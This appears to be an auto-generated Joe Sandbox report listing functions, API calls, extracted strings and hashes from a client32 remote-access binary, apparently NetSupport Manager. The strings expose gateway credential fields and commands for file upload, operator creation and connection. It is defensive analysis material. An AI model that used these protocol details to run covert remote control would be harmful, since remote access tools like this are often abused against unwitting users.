Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LocalRectTime__time64
String ID:
API String ID: 394334608-0
Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51

Function 68C92151 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_00031DB6,00000001), ref: 68C92164

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a9f50b27d5ebdb7cc156a75ac6d63c8866d1656fb25308f887f3c067305e43f2
Instruction ID: 0777e69abff12c50b0e295495afb36830696a1dbcfc9b7d580a876177f4162c6
Opcode Fuzzy Hash: a9f50b27d5ebdb7cc156a75ac6d63c8866d1656fb25308f887f3c067305e43f2
Instruction Fuzzy Hash: 7ED0C97195470A9AEB148E24D548769BAE4EB05B19F908A4DDAA2814C0E678D4488600

Function 68C748E0 Relevance: 59.8, APIs: 17, Strings: 17, Instructions: 327COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C74915

Part of subcall function 68C836F5: __fsopen.LIBCMT ref: 68C83702

GetLastError.KERNEL32 ref: 68C74943
_fseek.LIBCMT ref: 68C74963
_fseek.LIBCMT ref: 68C7497B
GetLastError.KERNEL32 ref: 68C74988
_free.LIBCMT ref: 68C74CB1
SetLastError.KERNEL32(00000000), ref: 68C74CCA

Strings

SUB=%s, xrefs: 68C74B6D
FNAME=%s, xrefs: 68C74BA1
ctl_putfile - _topen FAILED (error: %d), xrefs: 68C7494A
ON=%s, xrefs: 68C74AFF
putfile - _read FAILED (error: %d), xrefs: 68C749E1
OFFSET=%d, xrefs: 68C74BB6
FLEN=%d, xrefs: 68C74B3F
PWD=%s, xrefs: 68C74B21
MORE=%d, xrefs: 68C74C36
GSK=%s, xrefs: 68C74AD1
CMD=PUTFILE, xrefs: 68C74AAD
ctl_putfile - _filelength FAILED (error: %d), xrefs: 68C7498F
Gateway_Operator, xrefs: 68C74A47
Gateway_Gsk, xrefs: 68C74A37
DATA=, xrefs: 68C74BF2
ctl_putfile - empty file (%s), xrefs: 68C749AC
Gateway_Password, xrefs: 68C74A63

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_fseek$__fsopen_free_memset
String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
API String ID: 908761794-2149975586
Opcode ID: 831c0e3745d0c38b304acd418f30f38d5d3177a87c7c47f857d99982921c500f
Instruction ID: 79031f16c3318b30db7fef911cd3b6ca24e8ddd58d95ab80804398a43f97133f
Opcode Fuzzy Hash: 831c0e3745d0c38b304acd418f30f38d5d3177a87c7c47f857d99982921c500f
Instruction Fuzzy Hash: 52B172B5D4021CABDB20DBF5CC84FEEB7B8AF44318F904169E519A7241FB319A45CBA1

Function 68C6D140 Relevance: 54.6, APIs: 15, Strings: 16, Instructions: 362sleepsynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C6D1BA
WaitForSingleObject.KERNEL32(000002F0,000000FF,00000001,00000000), ref: 68C6D1E1

Part of subcall function 68C77BE0: _memset.LIBCMT ref: 68C77BFF
Part of subcall function 68C77BE0: _strncpy.LIBCMT ref: 68C77C0B

EnterCriticalSection.KERNEL32(68CAB898), ref: 68C6D212
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C6D223

Part of subcall function 68C68C30: _memset.LIBCMT ref: 68C68C5B
Part of subcall function 68C68C30: _free.LIBCMT ref: 68C68CCC

Part of subcall function 68C68B50: _memset.LIBCMT ref: 68C68B68
Part of subcall function 68C68B50: wsprintfA.USER32 ref: 68C68B87

_free.LIBCMT ref: 68C6D39A
_strncpy.LIBCMT ref: 68C6D3C9

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

_free.LIBCMT ref: 68C6D4D5
_free.LIBCMT ref: 68C6D53F
_free.LIBCMT ref: 68C6D545
Sleep.KERNEL32(00000014), ref: 68C6D573
_free.LIBCMT ref: 68C6D5C8
Sleep.KERNEL32(00000064,?,?,?,?), ref: 68C6D5DC

Strings

USER=%s, xrefs: 68C6D4C9
MACADDRESS=%s, xrefs: 68C6D46D
PROTOCOL_VER=%u.%u, xrefs: 68C6D2FE
CONTROL_NAME=%s, xrefs: 68C6D314
1.1, xrefs: 68C6D1FB
PWD=%s, xrefs: 68C6D4EE
226546, xrefs: 68C6D309, 68C6D5B2
GSK=%s, xrefs: 68C6D493
CMD=CTL_CONNECT, xrefs: 68C6D2DD
Gateway_Username, xrefs: 68C6D242
Gateway_Gsk, xrefs: 68C6D232
CLIENT_NAME=%s, xrefs: 68C6D388
CLIENT_IP_ADDRESS=%s, xrefs: 68C6D34D
Gateway_Password, xrefs: 68C6D264
CLIENT_IP_ADDRESS=0.0.0.0, xrefs: 68C6D361
HOSTNAME=%s, xrefs: 68C6D412

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$_memset$CriticalSectionSleep_strncpy$EnterLeaveObjectSingleWait__vswprintf_mallocwsprintf
String ID: 1.1$226546$CLIENT_IP_ADDRESS=%s$CLIENT_IP_ADDRESS=0.0.0.0$CLIENT_NAME=%s$CMD=CTL_CONNECT$CONTROL_NAME=%s$GSK=%s$Gateway_Gsk$Gateway_Password$Gateway_Username$HOSTNAME=%s$MACADDRESS=%s$PROTOCOL_VER=%u.%u$PWD=%s$USER=%s
API String ID: 2732282590-986994855
Opcode ID: 05d869346762f87635d72d41dd94bf4cc8251f5a57eac202d355ba50e6c8d71f
Instruction ID: 8eb835bf8adb3a252598042a60df7a3089b2e3d1300e7859267d25424b49df8b
Opcode Fuzzy Hash: 05d869346762f87635d72d41dd94bf4cc8251f5a57eac202d355ba50e6c8d71f
Instruction Fuzzy Hash: 3CE1A3B5C40219AFCB21CF64CC94FEEB7B8AF49314F9441A9E61967240F735AA81CF91

Function 68C75170 Relevance: 52.8, APIs: 17, Strings: 13, Instructions: 281sleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C751AD
EnterCriticalSection.KERNEL32(68CAB898), ref: 68C7522C
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C75245
_free.LIBCMT ref: 68C75348

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

_free.LIBCMT ref: 68C753DD
_memset.LIBCMT ref: 68C753F4
_free.LIBCMT ref: 68C75448

Part of subcall function 68C77B60: _sprintf.LIBCMT ref: 68C77B77

Part of subcall function 68C777E0: _free.LIBCMT ref: 68C777EF

_free.LIBCMT ref: 68C754AC
_free.LIBCMT ref: 68C754BB
GetTickCount.KERNEL32 ref: 68C754C9
GetTickCount.KERNEL32 ref: 68C754D3
Sleep.KERNEL32(00000014), ref: 68C754E9
EnterCriticalSection.KERNEL32(68CAB898), ref: 68C75512
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C7554D
_free.LIBCMT ref: 68C753A3

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C7556E
SetLastError.KERNEL32(00000057), ref: 68C7557D

Strings

ctl_addoperator - INVALID PARAMETER, xrefs: 68C75555
ON=%s, xrefs: 68C7533C
PWD=%s, xrefs: 68C75361
GSK=%s, xrefs: 68C75307
W, xrefs: 68C75562
Gateway_Gsk, xrefs: 68C7524E
Gateway_Operator, xrefs: 68C7525E
CMD=ADDOPERATOR, xrefs: 68C752DD
NEWPWD=%s, xrefs: 68C7543C
Gateway_Password, xrefs: 68C75280
NEWON=%s, xrefs: 68C75397
NEWFN=%s, xrefs: 68C753D1
NEWPERMS=%u, xrefs: 68C75457

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$CriticalSection$CountEnterErrorLastLeaveTick_memset$FreeHeapSleep__vswprintf_malloc_sprintf
String ID: CMD=ADDOPERATOR$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$NEWFN=%s$NEWON=%s$NEWPERMS=%u$NEWPWD=%s$ON=%s$PWD=%s$W$ctl_addoperator - INVALID PARAMETER
API String ID: 4103114184-1141881251
Opcode ID: a4bdf393a6f11e22fea4fc161271d85740a899529d3cfaf042581824349fc3ec
Instruction ID: abdf0e52dab72cc1d7d9c80c151ef6e57593a527f19935ea9d488aaf1d020b30
Opcode Fuzzy Hash: a4bdf393a6f11e22fea4fc161271d85740a899529d3cfaf042581824349fc3ec
Instruction Fuzzy Hash: 5CB153B5D4025AEFDB20DFA4CC84FEE77B4AB04308F8444A9E51967141F774AA84DFA1

Function 68C6CDB0 Relevance: 52.7, APIs: 11, Strings: 19, Instructions: 247COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C6CDF0
EnterCriticalSection.KERNEL32(68CAB898,00000000,?), ref: 68C6CE13
InterlockedIncrement.KERNEL32(-68CACB16), ref: 68C6CE29
InterlockedIncrement.KERNEL32(-68CACB86), ref: 68C6CE2F

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C6CE36
_free.LIBCMT ref: 68C6CF2C
_free.LIBCMT ref: 68C6CFD7

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C6D029
_free.LIBCMT ref: 68C6D0CA
_free.LIBCMT ref: 68C6D109
_free.LIBCMT ref: 68C6D115

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

Strings

REQHOSTNAME=1, xrefs: 68C6CF74
SERVICETYPE=CLASS, xrefs: 68C6D057
USER=%s, xrefs: 68C6D01D
CONTEXT=%s, xrefs: 68C6CFCB
GSK, xrefs: 68C6CE5C
CMD=CTL_BROWSE, xrefs: 68C6CEED
CTLTYPE=%d, xrefs: 68C6CFE8
Gateway_Name, xrefs: 68C6CE48
REQUSERNAME=1, xrefs: 68C6CF60
PWD=%s, xrefs: 68C6D042
MATCH_NAME=%s, xrefs: 68C6CF20
GSK=%s, xrefs: 68C6CF98
CSPEC=%s, xrefs: 68C6D0BE
APPTYPE=%d, xrefs: 68C6D08A
Gateway_Username, xrefs: 68C6CE77
Gateway_Gsk, xrefs: 68C6CE63, 68C6CE6B
Gateway_Password, xrefs: 68C6CE93
WANTSHELP=1, xrefs: 68C6CF46
SERVICETYPE=DEPT, xrefs: 68C6D06C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$CriticalIncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
API String ID: 2543302378-3410294771
Opcode ID: 10a5871d871640d67dd1bb61e4b97ff806ffaa243afe91726a6f6ebda1fb12ca
Instruction ID: 89c1f04cf9a011ca20dbc2494e5393a419ab9c59a4897d0d040dbb6a40961d39
Opcode Fuzzy Hash: 10a5871d871640d67dd1bb61e4b97ff806ffaa243afe91726a6f6ebda1fb12ca
Instruction Fuzzy Hash: 1B9164B6C4015EABCB31DBA4DC84FFE7778AB44304F8444AAA51A77141FB305A84DFA4

Function 11139060 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 229registrylibraryloaderCOMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
GetStockObject.GDI32(00000004), ref: 111390C5
RegisterClassA.USER32(?), ref: 111390D9
GetLastError.KERNEL32 ref: 1113914F
GetLastError.KERNEL32 ref: 1113916B
CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
UpdateWindow.USER32(?), ref: 1113929B
GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322

Strings

m_hWnd, xrefs: 1113921B, 11139250, 1113928A, 111392E0
BlankWidth, xrefs: 111390FA
Blank, xrefs: 111391C6
Error. RegisterClass(%s) failed, e=%d, xrefs: 11139172
Info. Class %s already registered, xrefs: 1113915C
_debug, xrefs: 111390FF, 1113911C
BlankWnd x%x created, w=%d, h=%d, xrefs: 111391E9
Error setting blankwnd timer, e=%d, xrefs: 1113930B
DwmEnableComposition, xrefs: 111392B0
Error. BlankWnd not created, e=%d, xrefs: 11139329
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11139216, 1113924B, 11139285, 111392DB
BlankHeight, xrefs: 1113910B
NSMBlankWnd, xrefs: 111390D2, 1113915B, 11139171, 111391CB

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1116282658-3566152235
Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55

Function 110433B0 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 327windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,77077310), ref: 11141457

ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
_memset.LIBCMT ref: 11043445
_strncpy.LIBCMT ref: 11043473
wsprintfA.USER32 ref: 11043558
_strncpy.LIBCMT ref: 110435A1
_strncpy.LIBCMT ref: 110435D5
SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
BringWindowToTop.USER32(?), ref: 110436CA
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8

Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E

MessageBeep.USER32(000000FF), ref: 11043705

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetDlgItem.USER32(?,00000002), ref: 1104372A
SetFocus.USER32(00000000), ref: 11043731

Strings

Client, xrefs: 110434E3, 11043632
m_hWnd, xrefs: 1104365C
*UserAckRejectDefault, xrefs: 1104370F
helpdesk.ico, xrefs: 110433DC
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11043657
*UserAckWording, xrefs: 110434B4
AckDlgDisplayText, xrefs: 110434DE
*UserAckRejectWording, xrefs: 11043607
AckDlgTimeOut, xrefs: 1104362D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemWindow$Text_strncpy$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimer__wcstoi64_memsetwsprintf
String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
API String ID: 1946598539-1930157642
Opcode ID: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
Instruction ID: ded1bb61fb3941f1bcfc90b6e22c684d82d72c36ad168629116a92ba92965352
Opcode Fuzzy Hash: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
Instruction Fuzzy Hash: 83B12774B40316AFE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9848B90

Function 1109D0D0 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 278COMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
CloseHandle.KERNEL32(00000000), ref: 1109D180
ResetEvent.KERNEL32(?), ref: 1109D195
ResetEvent.KERNEL32(?), ref: 1109D19B
SetEvent.KERNEL32(?), ref: 1109D1A1

Strings

iffy result, xrefs: 1109D425
senderror, xrefs: 1109D3FF
..\CTL32\ipc.cpp, xrefs: 1109D31A
deadshare, xrefs: 1109D217
cbdata=%d, datalen-sizeof=%d, xrefs: 1109D303
no error, xrefs: 1109D3BA
timeout, xrefs: 1109D246

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
